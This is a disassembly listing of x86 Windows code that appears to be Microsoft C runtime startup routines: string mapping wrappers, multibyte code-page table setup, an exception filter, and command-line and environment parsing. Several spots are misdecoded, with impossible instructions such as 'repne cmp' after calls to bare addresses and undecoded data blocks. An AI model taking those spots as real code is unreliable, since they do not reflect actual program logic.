jz loc_416DB1
cmp esi, [ebp+1Ch]
jg short loc_416D22
push dword ptr [ebp+1Ch]
push dword ptr [ebp+18h]
push ebx
push dword ptr [ebp-24h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call ds:dword_41C178 ; LCMapStringW
test eax, eax
jnz loc_416DB1
loc_416D22: ; CODE XREF: seg000:00416C49�j
; seg000:00416C80�j ...
xor eax, eax
loc_416D24: ; CODE XREF: seg000:00416C41�j
; seg000:00416DB3�j
lea esp, [ebp-38h]
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_416D36: ; CODE XREF: seg000:00416CF4�j
mov dword ptr [ebp-4], 1
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_410BE0
mov [ebp-18h], esp
mov ebx, esp
mov [ebp-20h], ebx
or dword ptr [ebp-4], 0FFFFFFFFh
jmp short loc_416D6A
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
xor edi, edi
xor ebx, ebx
or dword ptr [ebp-4], 0FFFFFFFFh
mov esi, [ebp-28h]
loc_416D6A: ; CODE XREF: seg000:00416D56�j
cmp ebx, edi
jz short loc_416D22
push esi
push ebx
push dword ptr [ebp-1Ch]
push dword ptr [ebp-24h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call ds:dword_41C178 ; LCMapStringW
test eax, eax
jz short loc_416D22
cmp [ebp+1Ch], edi
push edi
push edi
jnz short loc_416D91
push edi
push edi
jmp short loc_416D97
; ---------------------------------------------------------------------------
loc_416D91: ; CODE XREF: seg000:00416D8B�j
push dword ptr [ebp+1Ch]
push dword ptr [ebp+18h]
loc_416D97: ; CODE XREF: seg000:00416D8F�j
push esi
push ebx
push 220h
push dword ptr [ebp+20h]
call ds:dword_41C11C ; WideCharToMultiByte
mov esi, eax
cmp esi, edi
jz loc_416D22
loc_416DB1: ; CODE XREF: seg000:00416CF9�j
; seg000:00416D1C�j
mov eax, esi
jmp loc_416D24
; =============== S U B R O U T I N E =======================================
sub_416DB8 proc near ; CODE XREF: seg000:00416C15�p
; seg000:0041A7B6�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
mov eax, [esp+arg_0]
test edx, edx
push esi
lea ecx, [edx-1]
jz short loc_416DD5
loc_416DC8: ; CODE XREF: sub_416DB8+1B�j
cmp byte ptr [eax], 0
jz short loc_416DD5
inc eax
mov esi, ecx
dec ecx
test esi, esi
jnz short loc_416DC8
loc_416DD5: ; CODE XREF: sub_416DB8+E�j
; sub_416DB8+13�j
cmp byte ptr [eax], 0
pop esi
jnz short loc_416DE0
sub eax, [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_416DE0: ; CODE XREF: sub_416DB8+21�j
mov eax, edx
retn
sub_416DB8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416DE3 proc near ; CODE XREF: sub_4171A7+B�p
var_18 = dword ptr -18h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
push [ebp+arg_0]
call loc_416F7C
mov esi, eax
pop ecx
cmp esi, ds:dword_460C64
mov [ebp+arg_0], esi
jz loc_416F70
xor ebx, ebx
cmp esi, ebx
jz loc_416F66
xor edx, edx
mov eax, offset dword_42E510
loc_416E17: ; CODE XREF: sub_416DE3+41�j
cmp [eax], esi
jz short loc_416E8D
add eax, 30h
inc edx
cmp eax, offset dword_42E600
jl short loc_416E17
lea eax, [ebp+var_18]
push eax
push esi
call near ptr 0CA0004h
repne cmp eax, 1
jnz loc_416F5E
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_460D80
cmp [ebp+var_18], 1
mov ds:dword_460C64, esi
rep stosd
stosb
mov ds:dword_460E84, ebx
jbe loc_416F4C
cmp [ebp+var_12], 0
jz loc_416F22
lea ecx, [ebp+var_11]
loc_416E6A: ; CODE XREF: sub_416DE3+139�j
mov dl, [ecx]
test dl, dl
jz loc_416F22
movzx eax, byte ptr [ecx-1]
movzx edx, dl
loc_416E7B: ; CODE XREF: sub_416DE3+A8�j
cmp eax, edx
ja loc_416F16
or ds:byte_460D81[eax], 4
inc eax
jmp short loc_416E7B
; ---------------------------------------------------------------------------
loc_416E8D: ; CODE XREF: sub_416DE3+36�j
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_460D80
rep stosd
lea esi, [edx+edx*2]
mov [ebp+var_4], ebx
shl esi, 4
stosb
lea ebx, dword_42E520[esi]
loc_416EA9: ; CODE XREF: sub_416DE3+103�j
cmp byte ptr [ebx], 0
mov ecx, ebx
jz short loc_416EDC
loc_416EB0: ; CODE XREF: sub_416DE3+F7�j
mov dl, [ecx+1]
test dl, dl
jz short loc_416EDC
movzx eax, byte ptr [ecx]
movzx edi, dl
cmp eax, edi
ja short loc_416ED5
mov edx, [ebp+var_4]
mov dl, ds:byte_42E508[edx]
loc_416ECA: ; CODE XREF: sub_416DE3+F0�j
or ds:byte_460D81[eax], dl
inc eax
cmp eax, edi
jbe short loc_416ECA
loc_416ED5: ; CODE XREF: sub_416DE3+DC�j
inc ecx
inc ecx
cmp byte ptr [ecx], 0
jnz short loc_416EB0
loc_416EDC: ; CODE XREF: sub_416DE3+CB�j
; sub_416DE3+D2�j
inc [ebp+var_4]
add ebx, 8
cmp [ebp+var_4], 4
jb short loc_416EA9
mov eax, [ebp+arg_0]
mov ds:dword_460C7C, 1
push eax
mov ds:dword_460C64, eax
call sub_416FC6
lea esi, dword_42E514[esi]
mov edi, offset dword_460C70
movsd
movsd
pop ecx
mov ds:dword_460E84, eax
movsd
jmp short loc_416F6B
; ---------------------------------------------------------------------------
loc_416F16: ; CODE XREF: sub_416DE3+9A�j
inc ecx
inc ecx
cmp byte ptr [ecx-1], 0
jnz loc_416E6A
loc_416F22: ; CODE XREF: sub_416DE3+7E�j
; sub_416DE3+8B�j
push 1
pop eax
loc_416F25: ; CODE XREF: sub_416DE3+14F�j
or ds:byte_460D81[eax], 8
inc eax
cmp eax, 0FFh
jb short loc_416F25
push esi
call sub_416FC6
pop ecx
mov ds:dword_460E84, eax
mov ds:dword_460C7C, 1
jmp short loc_416F52
; ---------------------------------------------------------------------------
loc_416F4C: ; CODE XREF: sub_416DE3+74�j
mov ds:dword_460C7C, ebx
loc_416F52: ; CODE XREF: sub_416DE3+167�j
xor eax, eax
mov edi, offset dword_460C70
stosd
stosd
stosd
jmp short loc_416F6B
; ---------------------------------------------------------------------------
loc_416F5E: ; CODE XREF: sub_416DE3+51�j
cmp ds:dword_45F8E8, ebx
jz short loc_416F74
loc_416F66: ; CODE XREF: sub_416DE3+27�j
call sub_416FF9
loc_416F6B: ; CODE XREF: sub_416DE3+131�j
; sub_416DE3+179�j
call sub_417022
loc_416F70: ; CODE XREF: sub_416DE3+1D�j
xor eax, eax
jmp short loc_416F77
; ---------------------------------------------------------------------------
loc_416F74: ; CODE XREF: sub_416DE3+181�j
or eax, 0FFFFFFFFh
loc_416F77: ; CODE XREF: sub_416DE3+18F�j
pop edi
pop esi
pop ebx
leave
retn
sub_416DE3 endp
; ---------------------------------------------------------------------------
loc_416F7C: ; CODE XREF: sub_416DE3+C�p
mov eax, [esp+4]
and ds:dword_45F8E8, 0
cmp eax, 0FFFFFFFEh
jnz short near ptr loc_416F9B+1
mov ds:dword_45F8E8, 1
call near ptr 3D0000h
loc_416F9B: ; CODE XREF: seg000:00416F8A�j
mov edx, 75FDF883h
adc bh, al
add eax, offset dword_45F8E8
add [eax], eax
; ---------------------------------------------------------------------------
db 2 dup(0), 0E8h
dd 869054h, 0FCF8836Ch, 0E0A10F75h, 0C70045F8h, 45F8E805h
dd 100h
db 0, 0C3h
; =============== S U B R O U T I N E =======================================
sub_416FC6 proc near ; CODE XREF: sub_416DE3+118�p
; sub_416DE3+152�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
sub eax, 3A4h
jz short loc_416FF3
sub eax, 4
jz short loc_416FED
sub eax, 0Dh
jz short loc_416FE7
dec eax
jz short loc_416FE1
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_416FE1: ; CODE XREF: sub_416FC6+16�j
mov eax, 404h
retn
; ---------------------------------------------------------------------------
loc_416FE7: ; CODE XREF: sub_416FC6+13�j
mov eax, 412h
retn
; ---------------------------------------------------------------------------
loc_416FED: ; CODE XREF: sub_416FC6+E�j
mov eax, 804h
retn
; ---------------------------------------------------------------------------
loc_416FF3: ; CODE XREF: sub_416FC6+9�j
mov eax, 411h
retn
sub_416FC6 endp
; =============== S U B R O U T I N E =======================================
sub_416FF9 proc near ; CODE XREF: sub_416DE3:loc_416F66�p
push edi
push 40h
pop ecx
xor eax, eax
mov edi, offset byte_460D80
rep stosd
stosb
xor eax, eax
mov edi, offset dword_460C70
mov ds:dword_460C64, eax
mov ds:dword_460C7C, eax
mov ds:dword_460E84, eax
stosd
stosd
stosd
pop edi
retn
sub_416FF9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417022 proc near ; CODE XREF: sub_416DE3:loc_416F6B�p
var_514 = byte ptr -514h
var_314 = byte ptr -314h
var_214 = byte ptr -214h
var_114 = byte ptr -114h
var_14 = byte ptr -14h
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
push ebp
mov ebp, esp
sub esp, 514h
lea eax, [ebp+var_14]
push esi
push eax
push ds:dword_460C64
call near ptr 0CC0004h
lock cmp eax, 1
jnz loc_41715B
xor eax, eax
mov esi, 100h
loc_41704C: ; CODE XREF: sub_417022+34�j
mov [ebp+eax+var_114], al
inc eax
cmp eax, esi
jb short loc_41704C
mov al, [ebp+var_E]
mov [ebp+var_114], 20h
test al, al
jz short loc_41709D
push ebx
push edi
lea edx, [ebp+var_D]
loc_41706B: ; CODE XREF: sub_417022+77�j
movzx ecx, byte ptr [edx]
movzx eax, al
cmp eax, ecx
ja short loc_417092
sub ecx, eax
lea edi, [ebp+eax+var_114]
inc ecx
mov eax, 20202020h
mov ebx, ecx
shr ecx, 2
rep stosd
mov ecx, ebx
and ecx, 3
rep stosb
loc_417092: ; CODE XREF: sub_417022+51�j
inc edx
inc edx
mov al, [edx-1]
test al, al
jnz short loc_41706B
pop edi
pop ebx
loc_41709D: ; CODE XREF: sub_417022+42�j
push 0
lea eax, [ebp+var_514]
push ds:dword_460E84
push ds:dword_460C64
push eax
lea eax, [ebp+var_114]
push esi
push eax
push 1
call loc_4180E4
push 0
lea eax, [ebp+var_214]
push ds:dword_460C64
push esi
push eax
lea eax, [ebp+var_114]
push esi
push eax
push esi
push ds:dword_460E84
call loc_416B94
push 0
lea eax, [ebp+var_314]
push ds:dword_460C64
push esi
push eax
lea eax, [ebp+var_114]
push esi
push eax
push 200h
push ds:dword_460E84
call loc_416B94
add esp, 5Ch
xor eax, eax
lea ecx, [ebp+var_514]
loc_417118: ; CODE XREF: sub_417022+135�j
mov dx, [ecx]
test dl, 1
jz short loc_417136
or ds:byte_460D81[eax], 10h
mov dl, [ebp+eax+var_214]
loc_41712E: ; CODE XREF: sub_417022+127�j
mov ds:byte_460C80[eax], dl
jmp short loc_417152
; ---------------------------------------------------------------------------
loc_417136: ; CODE XREF: sub_417022+FC�j
test dl, 2
jz short loc_41714B
or ds:byte_460D81[eax], 20h
mov dl, [ebp+eax+var_314]
jmp short loc_41712E
; ---------------------------------------------------------------------------
loc_41714B: ; CODE XREF: sub_417022+117�j
and ds:byte_460C80[eax], 0
loc_417152: ; CODE XREF: sub_417022+112�j
inc eax
inc ecx
inc ecx
cmp eax, esi
jb short loc_417118
jmp short loc_4171A4
; ---------------------------------------------------------------------------
loc_41715B: ; CODE XREF: sub_417022+1D�j
xor eax, eax
mov esi, 100h
loc_417162: ; CODE XREF: sub_417022+180�j
cmp eax, 41h
jb short loc_417180
cmp eax, 5Ah
ja short loc_417180
or ds:byte_460D81[eax], 10h
mov cl, al
add cl, 20h
loc_417178: ; CODE XREF: sub_417022+174�j
mov ds:byte_460C80[eax], cl
jmp short loc_41719F
; ---------------------------------------------------------------------------
loc_417180: ; CODE XREF: sub_417022+143�j
; sub_417022+148�j
cmp eax, 61h
jb short loc_417198
cmp eax, 7Ah
ja short loc_417198
or ds:byte_460D81[eax], 20h
mov cl, al
sub cl, 20h
jmp short loc_417178
; ---------------------------------------------------------------------------
loc_417198: ; CODE XREF: sub_417022+161�j
; sub_417022+166�j
and ds:byte_460C80[eax], 0
loc_41719F: ; CODE XREF: sub_417022+15C�j
inc eax
cmp eax, esi
jb short loc_417162
loc_4171A4: ; CODE XREF: sub_417022+137�j
pop esi
leave
retn
sub_417022 endp
; =============== S U B R O U T I N E =======================================
sub_4171A7 proc near ; CODE XREF: seg000:0041750B�p
; seg000:00417567�p
cmp ds:dword_460EAC, 0
jnz short locret_4171C2
push 0FFFFFFFDh
call sub_416DE3
pop ecx
mov ds:dword_460EAC, 1
locret_4171C2: ; CODE XREF: sub_4171A7+7�j
retn
sub_4171A7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4171C3 proc near ; CODE XREF: sub_4121E8+2B�p
; sub_4121E8+A6�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp ds:dword_460C7C, 0
push edi
mov edi, [ebp+arg_0]
mov [ebp+arg_0], edi
jnz short loc_4171E7
push [ebp+arg_8]
push [ebp+arg_4]
push edi
call sub_411D00
add esp, 0Ch
jmp short loc_41724A
; ---------------------------------------------------------------------------
loc_4171E7: ; CODE XREF: sub_4171C3+11�j
mov edx, [ebp+arg_8]
push esi
test edx, edx
jz short loc_41722C
mov ecx, [ebp+arg_4]
loc_4171F2: ; CODE XREF: sub_4171C3+5B�j
mov al, [ecx]
dec edx
movzx esi, al
test ds:byte_460D81[esi], 4
mov [edi], al
jz short loc_417216
inc edi
inc ecx
test edx, edx
jz short loc_417222
mov al, [ecx]
dec edx
mov [edi], al
inc edi
inc ecx
test al, al
jz short loc_417228
jmp short loc_41721C
; ---------------------------------------------------------------------------
loc_417216: ; CODE XREF: sub_4171C3+3E�j
inc edi
inc ecx
test al, al
jz short loc_41722C
loc_41721C: ; CODE XREF: sub_4171C3+51�j
test edx, edx
jnz short loc_4171F2
jmp short loc_41722C
; ---------------------------------------------------------------------------
loc_417222: ; CODE XREF: sub_4171C3+44�j
and byte ptr [edi-1], 0
jmp short loc_41722C
; ---------------------------------------------------------------------------
loc_417228: ; CODE XREF: sub_4171C3+4F�j
and byte ptr [edi-2], 0
loc_41722C: ; CODE XREF: sub_4171C3+2A�j
; sub_4171C3+57�j ...
mov eax, edx
dec edx
test eax, eax
pop esi
jz short loc_417247
lea ecx, [edx+1]
xor eax, eax
mov edx, ecx
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
loc_417247: ; CODE XREF: sub_4171C3+6F�j
mov eax, [ebp+arg_0]
loc_41724A: ; CODE XREF: sub_4171C3+22�j
pop edi
pop ebp
retn
sub_4171C3 endp
; =============== S U B R O U T I N E =======================================
sub_41724D proc near ; CODE XREF: sub_41249F+16�p
; sub_4126F3+1D�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
xor edx, edx
mov ds:dword_45F848, ecx
mov eax, offset dword_42E600
loc_41725E: ; CODE XREF: sub_41724D+1E�j
cmp ecx, [eax]
jz short loc_417282
add eax, 8
inc edx
cmp eax, offset dword_42E768
jl short loc_41725E
cmp ecx, 13h
jb short loc_41728F
cmp ecx, 24h
ja short loc_41728F
mov ds:dword_45F844, 0Dh
retn
; ---------------------------------------------------------------------------
loc_417282: ; CODE XREF: sub_41724D+13�j
mov eax, ds:dword_42E604[edx*8]
mov ds:dword_45F844, eax
retn
; ---------------------------------------------------------------------------
loc_41728F: ; CODE XREF: sub_41724D+23�j
; sub_41724D+28�j
cmp ecx, 0BCh
jb short loc_4172A9
cmp ecx, 0CAh
mov ds:dword_45F844, 8
jbe short locret_4172B3
loc_4172A9: ; CODE XREF: sub_41724D+48�j
mov ds:dword_45F844, 16h
locret_4172B3: ; CODE XREF: sub_41724D+5A�j
retn
sub_41724D endp
; =============== S U B R O U T I N E =======================================
sub_4172B4 proc near ; CODE XREF: sub_41271D+8�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push dword ptr [esi+10h]
call sub_417F9D
test eax, eax
pop ecx
jz short loc_41733D
cmp esi, offset dword_42E8A8
jnz short loc_4172D2
xor eax, eax
jmp short loc_4172DD
; ---------------------------------------------------------------------------
loc_4172D2: ; CODE XREF: sub_4172B4+18�j
cmp esi, offset dword_42E8C8
jnz short loc_41733D
push 1
pop eax
loc_4172DD: ; CODE XREF: sub_4172B4+1C�j
inc ds:dword_45FA04
test word ptr [esi+0Ch], 10Ch
jnz short loc_41733D
cmp ds:dword_45F8EC[eax*4], 0
push ebx
push edi
lea edi, ds:45F8ECh[eax*4]
mov ebx, 1000h
jnz short loc_417323
push ebx
call sub_410C0F
test eax, eax
pop ecx
mov [edi], eax
jnz short loc_417323
lea eax, [esi+14h]
push 2
mov [esi+8], eax
mov [esi], eax
pop eax
mov [esi+18h], eax
mov [esi+4], eax
jmp short loc_417330
; ---------------------------------------------------------------------------
loc_417323: ; CODE XREF: sub_4172B4+4D�j
; sub_4172B4+5A�j
mov edi, [edi]
mov [esi+18h], ebx
mov [esi+8], edi
mov [esi], edi
mov [esi+4], ebx
loc_417330: ; CODE XREF: sub_4172B4+6D�j
or word ptr [esi+0Ch], 1102h
push 1
pop eax
pop edi
pop ebx
pop esi
retn
; ---------------------------------------------------------------------------
loc_41733D: ; CODE XREF: sub_4172B4+10�j
; sub_4172B4+24�j ...
xor eax, eax
pop esi
retn
sub_4172B4 endp
; =============== S U B R O U T I N E =======================================
sub_417341 proc near ; CODE XREF: sub_41271D+24�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0
push esi
jz short loc_41736B
mov esi, [esp+4+arg_4]
test byte ptr [esi+0Dh], 10h
jz short loc_41737C
push esi
call sub_416419
and byte ptr [esi+0Dh], 0EEh
and dword ptr [esi+18h], 0
and dword ptr [esi], 0
and dword ptr [esi+8], 0
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_41736B: ; CODE XREF: sub_417341+6�j
mov eax, [esp+4+arg_4]
test byte ptr [eax+0Dh], 10h
jz short loc_41737C
push eax
call sub_416419
pop ecx
loc_41737C: ; CODE XREF: sub_417341+10�j
; sub_417341+32�j
pop esi
retn
sub_417341 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
push dword ptr [ebp+8]
call sub_4174BF
test eax, eax
pop ecx
jz loc_4174B3
mov ebx, [eax+8]
test ebx, ebx
jz loc_4174B3
cmp ebx, 5
jnz short loc_4173AF
and dword ptr [eax+8], 0
push 1
pop eax
jmp loc_4174BC
; ---------------------------------------------------------------------------
loc_4173AF: ; CODE XREF: seg000:004173A1�j
cmp ebx, 1
jz loc_4174AE
mov ecx, ds:dword_45F8F4
mov [ebp+8], ecx
mov ecx, [ebp+0Ch]
mov ds:dword_45F8F4, ecx
mov ecx, [eax+4]
cmp ecx, 8
jnz loc_41749E
mov ecx, ds:dword_42E7E0
mov edx, ds:dword_42E7E4
add edx, ecx
push esi
cmp ecx, edx
jge short loc_4173FE
lea esi, [ecx+ecx*2]
sub edx, ecx
lea esi, ds:42E770h[esi*4]
loc_4173F5: ; CODE XREF: seg000:004173FC�j
and dword ptr [esi], 0
add esi, 0Ch
dec edx
jnz short loc_4173F5
loc_4173FE: ; CODE XREF: seg000:004173E7�j
mov eax, [eax]
mov esi, ds:dword_42E7EC
cmp eax, 0C000008Eh
jnz short loc_417419
mov ds:dword_42E7EC, 83h
jmp short loc_417489
; ---------------------------------------------------------------------------
loc_417419: ; CODE XREF: seg000:0041740B�j
cmp eax, 0C0000090h
jnz short loc_41742C
mov ds:dword_42E7EC, 81h
jmp short loc_417489
; ---------------------------------------------------------------------------
loc_41742C: ; CODE XREF: seg000:0041741E�j
cmp eax, 0C0000091h
jnz short loc_41743F
mov ds:dword_42E7EC, 84h
jmp short loc_417489
; ---------------------------------------------------------------------------
loc_41743F: ; CODE XREF: seg000:00417431�j
cmp eax, 0C0000093h
jnz short loc_417452
mov ds:dword_42E7EC, 85h
jmp short loc_417489
; ---------------------------------------------------------------------------
loc_417452: ; CODE XREF: seg000:00417444�j
cmp eax, 0C000008Dh
jnz short loc_417465
mov ds:dword_42E7EC, 82h
jmp short loc_417489
; ---------------------------------------------------------------------------
loc_417465: ; CODE XREF: seg000:00417457�j
cmp eax, 0C000008Fh
jnz short loc_417478
mov ds:dword_42E7EC, 86h
jmp short loc_417489
; ---------------------------------------------------------------------------
loc_417478: ; CODE XREF: seg000:0041746A�j
cmp eax, 0C0000092h
jnz short loc_417489
mov ds:dword_42E7EC, 8Ah
loc_417489: ; CODE XREF: seg000:00417417�j
; seg000:0041742A�j ...
push ds:dword_42E7EC
push 8
call ebx
pop ecx
mov ds:dword_42E7EC, esi
pop ecx
pop esi
jmp short loc_4174A6
; ---------------------------------------------------------------------------
loc_41749E: ; CODE XREF: seg000:004173D0�j
and dword ptr [eax+8], 0
push ecx
call ebx
pop ecx
loc_4174A6: ; CODE XREF: seg000:0041749C�j
mov eax, [ebp+8]
mov ds:dword_45F8F4, eax
loc_4174AE: ; CODE XREF: seg000:004173B2�j
or eax, 0FFFFFFFFh
jmp short loc_4174BC
; ---------------------------------------------------------------------------
loc_4174B3: ; CODE XREF: seg000:0041738D�j
; seg000:00417398�j
push dword ptr [ebp+0Ch]
call ds:dword_41C188 ; UnhandledExceptionFilter
loc_4174BC: ; CODE XREF: seg000:004173AA�j
; seg000:004174B1�j
pop ebx
pop ebp
retn
; =============== S U B R O U T I N E =======================================
sub_4174BF proc near ; CODE XREF: seg000:00417385�p
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
mov ecx, ds:dword_42E7E8
cmp ds:dword_42E768, edx
push esi
mov eax, offset dword_42E768
jz short loc_4174EC
lea esi, [ecx+ecx*2]
lea esi, ds:42E768h[esi*4]
loc_4174E1: ; CODE XREF: sub_4174BF+2B�j
add eax, 0Ch
cmp eax, esi
jnb short loc_4174EC
cmp [eax], edx
jnz short loc_4174E1
loc_4174EC: ; CODE XREF: sub_4174BF+16�j
; sub_4174BF+27�j
lea ecx, [ecx+ecx*2]
pop esi
lea ecx, ds:42E768h[ecx*4]
cmp eax, ecx
jnb short loc_4174FF
cmp [eax], edx
jz short locret_417501
loc_4174FF: ; CODE XREF: sub_4174BF+3A�j
xor eax, eax
locret_417501: ; CODE XREF: sub_4174BF+3E�j
retn
sub_4174BF endp
; ---------------------------------------------------------------------------
cmp ds:dword_460EAC, 0
jnz short loc_417510
call sub_4171A7
loc_417510: ; CODE XREF: seg000:00417509�j
push esi
mov esi, ds:dword_460EA4
mov al, [esi]
cmp al, 22h
jnz short loc_417542
loc_41751D: ; CODE XREF: seg000:00417535�j
; seg000:00417538�j
mov al, [esi+1]
inc esi
cmp al, 22h
jz short loc_41753A
test al, al
jz short loc_41753A
movzx eax, al
push eax
call sub_41959F
test eax, eax
pop ecx
jz short loc_41751D
inc esi
jmp short loc_41751D
; ---------------------------------------------------------------------------
loc_41753A: ; CODE XREF: seg000:00417523�j
; seg000:00417527�j
cmp byte ptr [esi], 22h
jnz short loc_41754C
loc_41753F: ; CODE XREF: seg000:00417554�j
inc esi
jmp short loc_41754C
; ---------------------------------------------------------------------------
loc_417542: ; CODE XREF: seg000:0041751B�j
cmp al, 20h
jbe short loc_41754C
loc_417546: ; CODE XREF: seg000:0041754A�j
inc esi
cmp byte ptr [esi], 20h
ja short loc_417546
loc_41754C: ; CODE XREF: seg000:0041753D�j
; seg000:00417540�j ...
mov al, [esi]
test al, al
jz short loc_417556
cmp al, 20h
jbe short loc_41753F
loc_417556: ; CODE XREF: seg000:00417550�j
mov eax, esi
pop esi
retn
; ---------------------------------------------------------------------------
push ebx
xor ebx, ebx
cmp ds:dword_460EAC, ebx
push esi
push edi
jnz short loc_41756C
call sub_4171A7
loc_41756C: ; CODE XREF: seg000:00417565�j
mov esi, ds:dword_45F890
xor edi, edi
loc_417574: ; CODE XREF: seg000:0041758A�j
mov al, [esi]
cmp al, bl
jz short loc_41758C
cmp al, 3Dh
jz short loc_41757F
inc edi
loc_41757F: ; CODE XREF: seg000:0041757C�j
push esi
call sub_410B60
pop ecx
lea esi, [esi+eax+1]
jmp short loc_417574
; ---------------------------------------------------------------------------
loc_41758C: ; CODE XREF: seg000:00417578�j
lea eax, ds:4[edi*4]
push eax
call sub_410C0F
mov esi, eax
pop ecx
cmp esi, ebx
mov ds:dword_45F86C, esi
jnz short loc_4175AE
push 9
call sub_412ADE
pop ecx
loc_4175AE: ; CODE XREF: seg000:004175A4�j
mov edi, ds:dword_45F890
cmp [edi], bl
jz short loc_4175F1
push ebp
loc_4175B9: ; CODE XREF: seg000:004175EE�j
push edi
call sub_410B60
mov ebp, eax
pop ecx
inc ebp
cmp byte ptr [edi], 3Dh
jz short loc_4175EA
push ebp
call sub_410C0F
cmp eax, ebx
pop ecx
mov [esi], eax
jnz short loc_4175DD
push 9
call sub_412ADE
pop ecx
loc_4175DD: ; CODE XREF: seg000:004175D3�j
push edi
push dword ptr [esi]
call sub_411B70
pop ecx
add esi, 4
pop ecx
loc_4175EA: ; CODE XREF: seg000:004175C6�j
add edi, ebp
cmp [edi], bl
jnz short loc_4175B9
pop ebp
loc_4175F1: ; CODE XREF: seg000:004175B6�j
push ds:dword_45F890
call sub_410C83
pop ecx
mov ds:dword_45F890, ebx
mov [esi], ebx
pop edi
pop esi
mov ds:dword_460EA8, 1
pop ebx
retn
; ---------------------------------------------------------------------------
db 55h
dd 5151EC8Bh, 39DB3353h, 460EAC1Dh, 75575600h, 0FB7DE805h
dd 0F8BEFFFFh, 680045F8h, 104h, 0C9E85356h, 0F3008C89h
dd 460EA4A1h, 7C358900h, 8B0045F8h, 741838FEh, 8DF88B02h
dd 8D50F845h, 5350FC45h, 4DE85753h, 8B000000h, 4D8BF845h
dd 88048DFCh, 95A1E850h, 0F08BFFFFh, 3B18C483h, 6A0875F3h
dd 0B460E808h, 8D59FFFFh, 8D50F845h, 8B50FC45h, 48DFC45h
dd 57565086h, 17E8h, 0FC458B00h, 4814C483h, 0F8643589h
dd 5E5F0045h, 45F860A3h, 0C3C95B00h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4176AC proc near
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_10]
mov eax, [ebp+arg_C]
push ebx
push esi
and dword ptr [ecx], 0
mov esi, [ebp+arg_8]
push edi
mov edi, [ebp+arg_4]
mov dword ptr [eax], 1
mov eax, [ebp+arg_0]
test edi, edi
jz short loc_4176D6
mov [edi], esi
add edi, 4
mov [ebp+arg_4], edi
loc_4176D6: ; CODE XREF: sub_4176AC+20�j
cmp byte ptr [eax], 22h
jnz short loc_41771F
loc_4176DB: ; CODE XREF: sub_4176AC+58�j
; sub_4176AC+5F�j
mov dl, [eax+1]
inc eax
cmp dl, 22h
jz short loc_41770D
test dl, dl
jz short loc_41770D
movzx edx, dl
test ds:byte_460D81[edx], 4
jz short loc_417700
inc dword ptr [ecx]
test esi, esi
jz short loc_417700
mov dl, [eax]
mov [esi], dl
inc esi
inc eax
loc_417700: ; CODE XREF: sub_4176AC+46�j
; sub_4176AC+4C�j
inc dword ptr [ecx]
test esi, esi
jz short loc_4176DB
mov dl, [eax]
mov [esi], dl
inc esi
jmp short loc_4176DB
; ---------------------------------------------------------------------------
loc_41770D: ; CODE XREF: sub_4176AC+36�j
; sub_4176AC+3A�j
inc dword ptr [ecx]
test esi, esi
jz short loc_417717
and byte ptr [esi], 0
inc esi
loc_417717: ; CODE XREF: sub_4176AC+65�j
cmp byte ptr [eax], 22h
jnz short loc_417762
inc eax
jmp short loc_417762
; ---------------------------------------------------------------------------
loc_41771F: ; CODE XREF: sub_4176AC+2D�j
; sub_4176AC+A5�j
inc dword ptr [ecx]
test esi, esi
jz short loc_41772A
mov dl, [eax]
mov [esi], dl
inc esi
loc_41772A: ; CODE XREF: sub_4176AC+77�j
mov dl, [eax]
inc eax
movzx ebx, dl
test ds:byte_460D81[ebx], 4
jz short loc_417745
inc dword ptr [ecx]
test esi, esi
jz short loc_417744
mov bl, [eax]
mov [esi], bl
inc esi
loc_417744: ; CODE XREF: sub_4176AC+91�j
inc eax
loc_417745: ; CODE XREF: sub_4176AC+8B�j
cmp dl, 20h
jz short loc_417753
test dl, dl
jz short loc_417757
cmp dl, 9
jnz short loc_41771F
loc_417753: ; CODE XREF: sub_4176AC+9C�j
test dl, dl
jnz short loc_41775A
loc_417757: ; CODE XREF: sub_4176AC+A0�j
dec eax
jmp short loc_417762
; ---------------------------------------------------------------------------
loc_41775A: ; CODE XREF: sub_4176AC+A9�j
test esi, esi
jz short loc_417762
and byte ptr [esi-1], 0
loc_417762: ; CODE XREF: sub_4176AC+6E�j
; sub_4176AC+71�j ...
and [ebp+arg_10], 0
loc_417766: ; CODE XREF: sub_4176AC+19E�j
cmp byte ptr [eax], 0
jz loc_41784F
loc_41776F: ; CODE XREF: sub_4176AC+D0�j
mov dl, [eax]
cmp dl, 20h
jz short loc_41777B
cmp dl, 9
jnz short loc_41777E
loc_41777B: ; CODE XREF: sub_4176AC+C8�j
inc eax
jmp short loc_41776F
